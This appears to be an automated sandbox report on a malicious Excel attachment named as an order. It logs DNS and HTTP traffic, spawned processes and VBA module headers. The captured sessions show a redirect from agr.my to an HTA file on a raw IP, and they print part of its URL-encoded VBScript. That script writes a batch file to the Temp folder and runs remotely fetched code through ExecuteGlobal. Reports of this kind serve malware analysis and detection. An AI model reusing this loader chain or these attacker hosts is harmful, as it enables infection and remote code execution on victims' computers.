| Mar 26, 2025 08:12:53.087416887 CET | 1.1.1.1 | 192.168.2.7 | 0xa410 | No error (0) | otelrules.svc.static.microsoft | otelrules-bzhndjfje8dvh5fd.z01.azurefd.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Mar 26, 2025 08:12:53.087416887 CET | 1.1.1.1 | 192.168.2.7 | 0xa410 | No error (0) | otelrules-bzhndjfje8dvh5fd.z01.azurefd.net | star-azurefd-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Mar 26, 2025 08:12:53.087416887 CET | 1.1.1.1 | 192.168.2.7 | 0xa410 | No error (0) | star-azurefd-prod.trafficmanager.net | shed.dual-low.s-part-0010.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Mar 26, 2025 08:12:53.087416887 CET | 1.1.1.1 | 192.168.2.7 | 0xa410 | No error (0) | shed.dual-low.s-part-0010.t-0009.t-msedge.net | s-part-0010.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Mar 26, 2025 08:12:53.087416887 CET | 1.1.1.1 | 192.168.2.7 | 0xa410 | No error (0) | s-part-0010.t-0009.t-msedge.net | | 13.107.246.38 | A (IP address) | IN (0x0001) | false |

                                          • agr.my
                                          • otelrules.svc.static.microsoft
                                          • 209.46.124.102
                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.749698209.46.124.102807144C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                          TimestampBytes transferredDirectionData
                                          Mar 26, 2025 08:12:40.232326984 CET257OUTGET /xampp/nicehome/goodgirlwithbestbattingwithgoodthings.hta?&bagpipe HTTP/1.1
                                          Accept: */*
                                          Accept-Encoding: gzip, deflate
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                          Connection: Keep-Alive
                                          Host: 209.46.124.102
                                          Mar 26, 2025 08:12:40.350461960 CET1254INHTTP/1.1 200 OK
                                          Date: Wed, 26 Mar 2025 07:12:40 GMT
                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                          Last-Modified: Wed, 26 Mar 2025 06:34:31 GMT
                                          ETag: "c9e-6313907aa7b9e"
                                          Accept-Ranges: bytes
                                          Content-Length: 3230
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: application/hta
                                          Data Ascii: <script>...document.write(unescape("%3C%21DOCTYPE%20html%3E%0A%3Chtml%3E%0A%3Chead%3E%0A%20%20%20%20%3Ctitle%3EExecutar%20Script%3C/title%3E%0A%20%20%20%20%3CHTA%3AAPPLICATION%20%0A%20%20%20%20%20%20%20%20APPLICATIONNAME%3D%22ScriptExecutor%22%0A%20%20%20%20%20%20%20%20BORDER%3D%22none%22%0A%20%20%20%20%20%20%20%20CAPTION%3D%22no%22%0A%20%20%20%20%20%20%20%20SHOWINTASKBAR%3D%22no%22%0A%20%20%20%20%20%20%20%20SINGLEINSTANCE%3D%22yes%22%0A%20%20%20%20%20%20%20%20WINDOWSTATE%3D%22minimize%22%0A%20%20%20%20/%3E%0A%20%20%20%20%3Cscript%20language%3D%22VBScript%22%3E%0A%20%20%20%20%20%20%20%20Dim%20lepismid%0A%20%20%20%20%20%20%20%20Set%20lepismid%20%3D%20CreateObject%28%22WScript.Shell%22%29%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20Dim%20sternebral%0A%20%20%20%20%20%20%20%20sternebral%20%3D%20%22C%3A%5CWindows%5CTemp%5Chorripilant.bat%22%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20Dim%20thermal%2C%20grec
                                          Mar 26, 2025 08:12:40.350495100 CET1254IN
                                          Data Ascii: o%0A%20%20%20%20%20%20%20%20Set%20thermal%20%3D%20CreateObject%28%22Scripting.FileSystemObject%22%29%0A%20%20%20%20%20%20%20%20Set%20greco%20%3D%20thermal.CreateTextFile%28sternebral%2C%20True%29%0A%0A%20%20%20%20%20%20%20%20Dim%20gainsaying%0
                                          Mar 26, 2025 08:12:40.350804090 CET1038IN
                                          Data Ascii: 20%25fugues%25%22%0A%20%20%20%20%20%20%20%20greco.WriteLine%20%22echo%20If%20documentarist.Status%20%3D%20200%20Then%20%3E%3E%20%25fugues%25%22%0A%20%20%20%20%20%20%20%20greco.WriteLine%20%22echo%20%20%20%20%20ExecuteGlobal%20documentarist.res


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.749697147.79.86.934437144C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                          TimestampBytes transferredDirectionData
                                          2025-03-26 07:12:39 UTC199OUTGET /mSGalN?&morning HTTP/1.1
                                          Accept: */*
                                          Accept-Encoding: gzip, deflate
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                          Host: agr.my
                                          Connection: Keep-Alive
                                          2025-03-26 07:12:40 UTC469INHTTP/1.1 302 Found
                                          Content-Length: 109
                                          Content-Type: text/plain; charset=utf-8
                                          Date: Wed, 26 Mar 2025 07:12:40 GMT
                                          Location: http://209.46.124.102/xampp/nicehome/goodgirlwithbestbattingwithgoodthings.hta?&bagpipe
                                          Strict-Transport-Security: max-age=15552000; includeSubDomains
                                          Vary: Accept
                                          X-Content-Type-Options: nosniff
                                          X-Dns-Prefetch-Control: off
                                          X-Download-Options: noopen
                                          X-Frame-Options: SAMEORIGIN
                                          X-Xss-Protection: 1; mode=block
                                          Connection: close
                                          2025-03-26 07:12:40 UTC109IN
                                          Data Ascii: Found. Redirecting to http://209.46.124.102/xampp/nicehome/goodgirlwithbestbattingwithgoodthings.hta?&bagpipe


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.74970013.107.246.384437144C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                          TimestampBytes transferredDirectionData
                                          2025-03-26 07:12:53 UTC226OUTGET /rules/excel.exe-Production-v19.bundle HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                          Host: otelrules.svc.static.microsoft
                                          2025-03-26 07:12:53 UTC493INHTTP/1.1 200 OK
                                          Date: Wed, 26 Mar 2025 07:12:53 GMT
                                          Content-Type: text/plain
                                          Content-Length: 1114783
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public
                                          Last-Modified: Mon, 24 Mar 2025 13:40:54 GMT
                                          ETag: "0x8DD6AD97FEF19EF"
                                          x-ms-request-id: ebdb26f1-701e-000d-2b05-9e6de3000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20250326T071253Z-17cccd5449bzd7mthC1EWRrdxw0000000fwg00000000a1xx
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2025-03-26 07:12:53 UTC15891IN
                                          Data Ascii: 100042v2+<?xml version="1.0" encoding="utf-8"?><R Id="100042" V="2" DC="SM" EN="Office.UX.Desktop.OfficeTheme.App.Init" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="cm9y5
                                          2025-03-26 07:12:53 UTC16384IN
                                          Data Ascii: /> </T></R><$!#>100117v0+<?xml version="1.0" encoding="utf-8"?><R Id="100117" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="8yllf" /> </S> <C T="W" I="0" O="false"> <V V="Click" T="W" /> </C> <C T="U32
                                          2025-03-26 07:12:53 UTC16384IN
                                          Data Ascii: </C> <T> <S T="2" /> <S T="3" /> </T></R><$!#>10781v1+<?xml version="1.0" encoding="utf-8"?><R Id="10781" V="1" DC="SM" T="Subrule" xmlns=""> <S> <UTS T="1" Id="bgo4t" /> <UTS T="2" Id="bhlvy" /> </S> <C T="I32
                                          2025-03-26 07:12:53 UTC16384IN
                                          Data Ascii: <L> <O T="GT"> <L> <S T="1" F="0" /> </L> <R> <V V="1000" T="U32" /> </R> </O> </L> <R> <O T="LE"> <
                                          2025-03-26 07:12:53 UTC16384IN
                                          Data Ascii: I="22" O="false" N="FlyoutVideoCallVideo"> <C> <S T="26" /> </C> </C> <C T="U32" I="23" O="false" N="FlyoutSaS"> <C> <S T="27" /> </C> </C> <C T="U32" I="24" O="false" N="FlyoutOverflow"> <C> <S T
                                          2025-03-26 07:12:53 UTC16384IN
                                          Data Ascii: coding="utf-8"?><R Id="10907" V="0" DC="SM" EN="Office.Outlook.Desktop.NDB.Unknown.Corruption" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" S="100" DCa="PSU" xmlns=""> <S> <Etw T="1" E="395" G="{2adf8e23-0af9-
                                          2025-03-26 07:12:53 UTC16384IN
                                          Data Ascii: "TelemetryShutdown" /> <UTS T="3" Id="bpfy1" /> <F T="4"> <O T="GT"> <L> <S T="3" F="PhotoSizeInBytes" /> </L> <R> <V V="0" T="U64" /> </R> </O> </F> </S> <C T="U
                                          2025-03-26 07:12:54 UTC16384IN
                                          Data Ascii: <L> <S T="4" F="eventId" /> </L> <R> <V V="135" T="I32" /> </R> </O> </F> <F T="7"> <O T="EQ"> <L> <S T="5" F="tcid" /> </L> <R> <V
                                          2025-03-26 07:12:54 UTC16384IN
                                          Data Ascii: <F T="10"> <O T="EQ"> <L> <S T="3" F="FileProtectionState" /> </L> <R> <V V="5" T="U32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="CountOfThrownException">
                                          2025-03-26 07:12:54 UTC16384IN
                                          Data Ascii: <S T="5" F="results_IsNull" /> </L> <R> <V V="false" T="B" /> </R> </O> </L> <R> <O T="EQ"> <L>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.74970113.107.246.384437144C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                          TimestampBytes transferredDirectionData
                                          2025-03-26 07:13:00 UTC214OUTGET /rules/rule120603v8s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                          Host: otelrules.svc.static.microsoft
                                          2025-03-26 07:13:00 UTC515INHTTP/1.1 200 OK
                                          Date: Wed, 26 Mar 2025 07:13:00 GMT
                                          Content-Type: text/xml
                                          Content-Length: 2128
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                          ETag: "0x8DC582BA41F3C62"
                                          x-ms-request-id: 0fe88ecf-101e-007a-32da-9b047e000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20250326T071300Z-17cccd5449bkk7bshC1EWR4rww0000000g10000000004trc
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2025-03-26 07:13:00 UTC2128IN
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120603" V="8" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAdditional" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" E="false" DL=


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          3192.168.2.74970213.107.246.384437144C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                          TimestampBytes transferredDirectionData
                                          2025-03-26 07:13:00 UTC214OUTGET /rules/rule120607v1s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                          Host: otelrules.svc.static.microsoft
                                          2025-03-26 07:13:00 UTC470INHTTP/1.1 200 OK
                                          Date: Wed, 26 Mar 2025 07:13:00 GMT
                                          Content-Type: text/xml
                                          Content-Length: 204
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                          ETag: "0x8DC582BB6C8527A"
                                          x-ms-request-id: fe09a350-901e-0048-3adf-9cb800000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20250326T071300Z-17cccd5449bg7c4bhC1EWR84740000000fz0000000006k8z
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2025-03-26 07:13:00 UTC204IN
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120607" V="1" DC="SM" T="Subrule" ER="120603" xmlns=""> <S> <UTS T="1" Id="bbpzs" A="940tc 9x5js" /> </S> <T> <S T="1" /> </T></R>



                                          Target ID:0
                                          Start time:03:11:43
                                          Start date:26/03/2025
                                          Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                          Imagebase:0xdc0000
                                          File size:53'161'064 bytes
                                          MD5 hash:4A871771235598812032C822E6F68F19
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:false

                                          Target ID:10
                                          Start time:03:12:39
                                          Start date:26/03/2025
                                          Path:C:\Windows\SysWOW64\mshta.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\mshta.exe -Embedding
                                          Imagebase:0x6b0000
                                          File size:13'312 bytes
                                          MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:false

                                          Target ID:12
                                          Start time:03:12:46
                                          Start date:26/03/2025
                                          Path:C:\Windows\splwow64.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\splwow64.exe 12288
                                          Imagebase:0x7ff7e5b60000
                                          File size:163'840 bytes
                                          MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:false

                                          Target ID:14
                                          Start time:03:13:01
                                          Start date:26/03/2025
                                          Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\ORDER 517-2025.xla.xlsx"
                                          Imagebase:0xdc0000
                                          File size:53'161'064 bytes
                                          MD5 hash:4A871771235598812032C822E6F68F19
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Call Graph

                                          callgraph 1 Error: Graph is empty

                                          Module: Sheet1

                                          Declaration
                                          Attribute VB_Name = "Sheet1"
                                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                          Attribute VB_GlobalNameSpace = False
                                          Attribute VB_Creatable = False
                                          Attribute VB_PredeclaredId = True
                                          Attribute VB_Exposed = True
                                          Attribute VB_TemplateDerived = False
                                          Attribute VB_Customizable = True

                                          Module: Sheet2

                                          Declaration
                                          Attribute VB_Name = "Sheet2"
                                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                          Attribute VB_GlobalNameSpace = False
                                          Attribute VB_Creatable = False
                                          Attribute VB_PredeclaredId = True
                                          Attribute VB_Exposed = True
                                          Attribute VB_TemplateDerived = False
                                          Attribute VB_Customizable = True

                                          Module: Sheet3

                                          Declaration
                                          Attribute VB_Name = "Sheet3"
                                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                          Attribute VB_GlobalNameSpace = False
                                          Attribute VB_Creatable = False
                                          Attribute VB_PredeclaredId = True
                                          Attribute VB_Exposed = True
                                          Attribute VB_TemplateDerived = False
                                          Attribute VB_Customizable = True

                                          Module: ThisWorkbook

                                          Declaration
                                          Attribute VB_Name = "ThisWorkbook"
                                          Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                          Attribute VB_GlobalNameSpace = False
                                          Attribute VB_Creatable = False
                                          Attribute VB_PredeclaredId = True
                                          Attribute VB_Exposed = True
                                          Attribute VB_TemplateDerived = False
                                          Attribute VB_Customizable = True